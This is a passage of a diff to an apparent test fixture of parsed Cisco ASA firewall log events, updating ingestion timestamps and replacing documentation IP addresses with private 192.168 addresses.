0x0]", + "ingested": "2021-12-09T13:34:16.395208900Z", + "original": "Apr 30 2013 09:23:24: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2321,8 +2321,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2012, @@ -2358,13 +2358,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565776400Z", - "original": "Apr 30 2013 09:23:34: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395214400Z", + "original": "Apr 30 2013 09:23:34: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2396,8 +2396,8 @@ }, "source": { "port": 53638, - "address": "192.0.2.126", - "ip": "192.0.2.126" + "address": "192.168.2.126", + "ip": "192.168.2.126" }, "tags": [ "preserve_original_event" @@ -2427,14 +2427,14 @@ }, "related": { "ip": [ - "192.0.2.126", + "192.168.2.126", "10.0.0.132" ] }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:38.565784300Z", - "original": "Apr 30 2013 09:23:40: %ASA-4-106023: Deny tcp src outside:192.0.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", + "ingested": "2021-12-09T13:34:16.395220Z", + "original": "Apr 30 2013 09:23:40: %ASA-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -2466,8 +2466,8 @@ }, "source": { "port": 53638, - "address": "192.0.2.126", - "ip": "192.0.2.126" + "address": "192.168.2.126", + "ip": "192.168.2.126" }, "tags": [ "preserve_original_event" @@ -2497,14 +2497,14 @@ }, "related": { "ip": [ - "192.0.2.126", + "192.168.2.126", "10.0.0.132" ] }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:38.565791900Z", - "original": "Apr 30 2013 09:23:41: %ASA-4-106023: Deny tcp src outside:192.0.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", + "ingested": "2021-12-09T13:34:16.395225400Z", + "original": "Apr 30 2013 09:23:41: %ASA-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -2531,8 +2531,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49840, @@ -2568,13 +2568,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565799700Z", - "original": "Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395230900Z", + "original": "Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2601,8 +2601,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2013, @@ -2638,13 +2638,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565807400Z", - "original": "Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395236300Z", + "original": "Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2671,8 +2671,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.99", - "ip": "192.0.0.99" + "address": "192.168.0.99", + "ip": "192.168.0.99" }, "source": { "port": 2241, @@ -2708,13 +2708,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.99" + "192.168.0.99" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565815Z", - "original": "Apr 15 2018 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -\u003e outside/192.0.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395241700Z", + "original": "Apr 15 2018 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -\u003e outside/192.168.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2788,7 +2788,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565822600Z", + "ingested": "2021-12-09T13:34:16.395247200Z", "original": "Dec 11 2018 08:01:24 \u003cIP\u003e: %ASA-6-302015: Built outbound UDP connection 447235 for outside:192.168.77.12/11180 (192.168.77.12/11180) to identity:10.0.13.13/80 (10.0.13.13/80)", "code": "302015", "kind": "event", @@ -2821,8 +2821,8 @@ }, "destination": { "port": 53, - "address": "192.0.0.12", - "ip": "192.0.0.12" + "address": "192.168.0.12", + "ip": "192.168.0.12" }, "source": { "port": 5555, @@ -2858,13 +2858,13 @@ "related": { "ip": [ "192.168.1.33", - "192.0.0.12" + "192.168.0.12" ] }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:38.565830400Z", - "original": "Dec 11 2018 08:01:24 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.0.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", + "ingested": "2021-12-09T13:34:16.395252700Z", + "original": "Dec 11 2018 08:01:24 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -2894,8 +2894,8 @@ }, "destination": { "port": 53, - "address": "192.0.0.12", - "ip": "192.0.0.12" + "address": "192.168.0.12", + "ip": "192.168.0.12" }, "source": { "port": 5555, @@ -2931,13 +2931,13 @@ "related": { "ip": [ "192.168.1.33", - "192.0.0.12" + "192.168.0.12" ] }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:38.565834600Z", - "original": "Dec 11 2018 08:01:24 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.0.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", + "ingested": "2021-12-09T13:34:16.395258200Z", + "original": "Dec 11 2018 08:01:24 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -2972,8 +2972,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3007,13 +3007,13 @@ "OCSP_Server" ], "ip": [ - "192.0.2.222" + "192.168.2.222" ] }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565838100Z", - "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", + "ingested": "2021-12-09T13:34:16.395263600Z", + "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3029,7 +3029,7 @@ "mapped_destination_host": "OCSP_Server", "destination_interface": "dmz", "mapped_source_port": 1234, - "mapped_source_ip": "192.0.2.222", + "mapped_source_ip": "192.168.2.222", "connection_id": "447236", "source_interface": "outside", "mapped_destination_port": 5678 @@ -3050,8 +3050,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3085,13 +3085,13 @@ "OCSP_Server" ], "ip": [ - "192.0.2.222" + "192.168.2.222" ] }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565843400Z", - "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", + "ingested": "2021-12-09T13:34:16.395269100Z", + "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3107,7 +3107,7 @@ "mapped_destination_host": "OCSP_Server", "destination_interface": "dmz", "mapped_source_port": 1234, - "mapped_source_ip": "192.0.2.222", + "mapped_source_ip": "192.168.2.222", "connection_id": "447236", "source_interface": "outside", "mapped_destination_port": 5678 @@ -3128,8 +3128,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3160,7 +3160,7 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, @@ -3168,8 +3168,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:38.565848700Z", - "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447236 for outside:192.0.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs", + "ingested": "2021-12-09T13:34:16.395274600Z", + "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447236 for outside:192.168.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs", "code": "302014", "kind": "event", "start": "2018-12-11T08:01:31.000Z", @@ -3205,8 +3205,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3237,7 +3237,7 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.35" ] }, @@ -3245,8 +3245,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:38.565855400Z", - "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", + "ingested": "2021-12-09T13:34:16.395280100Z", + "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", "code": "302014", "kind": "event", "start": "2018-12-11T08:00:30.000Z", @@ -3282,8 +3282,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3314,7 +3314,7 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.35" ] }, @@ -3322,8 +3322,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:38.565860700Z", - "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", + "ingested": "2021-12-09T13:34:16.395285500Z", + "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", "code": "302014", "kind": "event", "start": "2018-12-11T08:00:30.000Z", @@ -3359,8 +3359,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3385,14 +3385,14 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565864700Z", - "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-106015: Deny TCP (no connection) from 192.0.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", + "ingested": "2021-12-09T13:34:16.395291100Z", + "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", "code": "106015", "kind": "event", "action": "firewall-rule", @@ -3425,8 +3425,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3451,14 +3451,14 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565868900Z", - "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-106015: Deny TCP (no connection) from 192.0.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", + "ingested": "2021-12-09T13:34:16.395296500Z", + "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", "code": "106015", "kind": "event", "action": "firewall-rule", @@ -3486,8 +3486,8 @@ }, "destination": { "port": 5000, - "address": "192.0.0.12", - "ip": "192.0.0.12" + "address": "192.168.0.12", + "ip": "192.168.0.12" }, "source": { "port": 5679, @@ -3523,13 +3523,13 @@ "related": { "ip": [ "192.168.1.34", - "192.0.0.12" + "192.168.0.12" ] }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:38.565892Z", - "original": "Dec 11 2018 08:01:39 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.0.0.12/5000 by access-group \"dmz\" [0x123a465e, 0x8c20f21]", + "ingested": "2021-12-09T13:34:16.395318800Z", + "original": "Dec 11 2018 08:01:39 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.168.0.12/5000 by access-group \"dmz\" [0x123a465e, 0x8c20f21]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -3564,8 +3564,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3596,14 +3596,14 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565897700Z", - "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", + "ingested": "2021-12-09T13:34:16.395324800Z", + "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3619,7 +3619,7 @@ "destination_interface": "dmz", "mapped_source_port": 1234, "mapped_destination_ip": "192.168.1.34", - "mapped_source_ip": "192.0.2.222", + "mapped_source_ip": "192.168.2.222", "connection_id": "447237", "source_interface": "outside", "mapped_destination_port": 65000 @@ -3640,8 +3640,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3672,14 +3672,14 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565902800Z", - "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", + "ingested": "2021-12-09T13:34:16.395330200Z", + "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3695,7 +3695,7 @@ "destination_interface": "dmz", "mapped_source_port": 1234, "mapped_destination_ip": "192.168.1.34", - "mapped_source_ip": "192.0.2.222", + "mapped_source_ip": "192.168.2.222", "connection_id": "447237", "source_interface": "outside", "mapped_destination_port": 65000 @@ -3716,8 +3716,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3748,7 +3748,7 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "10.10.10.10" ] }, @@ -3756,8 +3756,8 @@ "severity": 6, "duration": 86399000000000, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:38.565909200Z", - "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447237 for outside:192.0.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs", + "ingested": "2021-12-09T13:34:16.395335600Z", + "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447237 for outside:192.168.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs", "code": "302014", "kind": "event", "start": "2018-12-10T08:01:54.000Z", @@ -3829,7 +3829,7 @@ "event": { "severity": 6, "duration": 122000000000, - "ingested": "2021-10-06T20:55:38.565916700Z", + "ingested": "2021-12-09T13:34:16.395341Z", "original": "Aug 15 2012 23:30:09 : %ASA-6-302016 Teardown UDP connection 40 for outside:10.44.4.4/500 to inside:10.44.2.2/500 duration 0:02:02 bytes 1416", "code": "302016", "kind": "event", @@ -3857,8 +3857,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.47", - "ip": "192.88.99.47" + "address": "192.168.99.47", + "ip": "192.168.99.47" }, "source": { "address": "0.0.0.0", @@ -3888,7 +3888,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.47" + "192.168.99.47" ] }, "host": { @@ -3896,8 +3896,8 @@ }, "event": { "severity": 2, - "ingested": "2021-10-06T20:55:38.565924100Z", - "original": "Sep 12 2014 06:50:53 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:34:16.395346200Z", + "original": "Sep 12 2014 06:50:53 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -3921,8 +3921,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.57", - "ip": "192.88.99.57" + "address": "192.168.99.57", + "ip": "192.168.99.57" }, "source": { "address": "0.0.0.0", @@ -3952,7 +3952,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.57" + "192.168.99.57" ] }, "host": { @@ -3960,8 +3960,8 @@ }, "event": { "severity": 2, - "ingested": "2021-10-06T20:55:38.565931500Z", - "original": "Sep 12 2014 06:51:01 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:34:16.395351500Z", + "original": "Sep 12 2014 06:51:01 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -3985,8 +3985,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.47", - "ip": "192.88.99.47" + "address": "192.168.99.47", + "ip": "192.168.99.47" }, "source": { "address": "0.0.0.0", @@ -4016,7 +4016,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.47" + "192.168.99.47" ] }, "host": { @@ -4024,8 +4024,8 @@ }, "event": { "severity": 2, - "ingested": "2021-10-06T20:55:38.565938900Z", - "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:34:16.395356800Z", + "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4049,8 +4049,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.47", - "ip": "192.88.99.47" + "address": "192.168.99.47", + "ip": "192.168.99.47" }, "source": { "address": "0.0.0.0", @@ -4080,7 +4080,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.47" + "192.168.99.47" ] }, "host": { @@ -4088,8 +4088,8 @@ }, "event": { "severity": 2, - "ingested": "2021-10-06T20:55:38.565946300Z", - "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:34:16.395361500Z", + "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4113,8 +4113,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.57", - "ip": "192.88.99.57" + "address": "192.168.99.57", + "ip": "192.168.99.57" }, "source": { "address": "0.0.0.0", @@ -4144,7 +4144,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.57" + "192.168.99.57" ] }, "host": { @@ -4152,8 +4152,8 @@ }, "event": { "severity": 2, - "ingested": "2021-10-06T20:55:38.565953800Z", - "original": "Sep 12 2014 06:51:06 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:34:16.395366900Z", + "original": "Sep 12 2014 06:51:06 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4177,8 +4177,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.57", - "ip": "192.88.99.57" + "address": "192.168.99.57", + "ip": "192.168.99.57" }, "source": { "address": "0.0.0.0", @@ -4208,7 +4208,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.57" + "192.168.99.57" ] }, "host": { @@ -4216,8 +4216,8 @@ }, "event": { "severity": 2, - "ingested": "2021-10-06T20:55:38.565961300Z", - "original": "Sep 12 2014 06:51:17 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:34:16.395372200Z", + "original": "Sep 12 2014 06:51:17 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4280,7 +4280,7 @@ }, "event": { "severity": 2, - "ingested": "2021-10-06T20:55:38.565965600Z", + "ingested": "2021-12-09T13:34:16.395377500Z", "original": "Sep 12 2014 06:52:48 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4344,7 +4344,7 @@ }, "event": { "severity": 2, - "ingested": "2021-10-06T20:55:38.565969100Z", + "ingested": "2021-12-09T13:34:16.395382700Z", "original": "Sep 12 2014 06:53:00 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4375,8 +4375,8 @@ }, "source": { "port": 24069, - "address": "192.0.2.95", - "ip": "192.0.2.95" + "address": "192.168.2.95", + "ip": "192.168.2.95" }, "tags": [ "preserve_original_event" @@ -4410,7 +4410,7 @@ "GIFRCHN01" ], "ip": [ - "192.0.2.95", + "192.168.2.95", "10.32.112.125" ] }, @@ -4419,8 +4419,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:38.565974300Z", - "original": "Sep 12 2014 06:53:01 GIFRCHN01 : %ASA-4-106023: Deny tcp src outside:192.0.2.95/24069 dst inside:10.32.112.125/25 by access-group \"PERMIT_IN\" [0x0, 0x0]\"", + "ingested": "2021-12-09T13:34:16.395387Z", + "original": "Sep 12 2014 06:53:01 GIFRCHN01 : %ASA-4-106023: Deny tcp src outside:192.168.2.95/24069 dst inside:10.32.112.125/25 by access-group \"PERMIT_IN\" [0x0, 0x0]\"", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -4484,7 +4484,7 @@ }, "event": { "severity": 3, - "ingested": "2021-10-06T20:55:38.565979400Z", + "ingested": "2021-12-09T13:34:16.395390600Z", "original": "Sep 12 2014 06:53:02 GIFRCHN01 : %ASA-3-313001: Denied ICMP type=3, code=3 from 10.2.3.5 on interface Outside", "code": "313001", "kind": "event", @@ -4547,7 +4547,7 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:38.565985800Z", + "ingested": "2021-12-09T13:34:16.395394500Z", "original": "Jan 14 2015 13:16:13: %ASA-4-313004: Denied ICMP type=0, from laddr 172.16.30.2 on interface inside to 172.16.1.10: no matching session", "code": "313004", "kind": "event", @@ -4576,15 +4576,15 @@ "level": "warning" }, "destination": { - "address": "192.88.99.129", + "address": "192.168.99.129", "port": 80, "domain": "bad.example.com", - "ip": "192.88.99.129" + "ip": "192.168.99.129" }, "source": { "nat": { "port": 7890, - "ip": "192.88.99.1" + "ip": "192.168.99.1" }, "address": "10.1.1.45", "port": 6798, @@ -4622,14 +4622,14 @@ ], "ip": [ "10.1.1.45", - "192.88.99.1", - "192.88.99.129" + "192.168.99.1", + "192.168.99.129" ] }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:38.565991Z", - "original": "Jan 14 2015 13:16:14: %ASA-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.88.99.1/7890) to outside:192.88.99.129/80 (192.88.99.129/80), destination 192.88.99.129 resolved from dynamic list: bad.example.com", + "ingested": "2021-12-09T13:34:16.395398600Z", + "original": "Jan 14 2015 13:16:14: %ASA-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.168.99.1/7890) to outside:192.168.99.129/80 (192.168.99.129/80), destination 192.168.99.129 resolved from dynamic list: bad.example.com", "code": "338002", "kind": "event", "action": "firewall-rule", @@ -4646,8 +4646,8 @@ "asa": { "destination_interface": "outside", "mapped_source_port": 7890, - "mapped_destination_ip": "192.88.99.129", - "mapped_source_ip": "192.88.99.1", + "mapped_destination_ip": "192.168.99.129", + "mapped_source_ip": "192.168.99.1", "rule_name": "dynamic", "source_interface": "inside", "mapped_destination_port": 80 @@ -4660,8 +4660,8 @@ }, "destination": { "port": 80, - "address": "192.0.2.223", - "ip": "192.0.2.223" + "address": "192.168.2.223", + "ip": "192.168.2.223" }, "source": { "nat": { @@ -4701,13 +4701,13 @@ "ip": [ "10.1.1.1", "10.2.1.1", - "192.0.2.223" + "192.168.2.223" ] }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:38.565995Z", - "original": "Jan 14 2015 13:16:14: %ASA-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.0.2.223/80 (192.0.2.223/80), destination 192.0.2.223 resolved from dynamic list: 192.0.2.223/255.255.255.255, threat-level: very-high, category: Malware", + "ingested": "2021-12-09T13:34:16.395403900Z", + "original": "Jan 14 2015 13:16:14: %ASA-4-338004: Dynamic Filter monitored blacklisted TCP traffic from 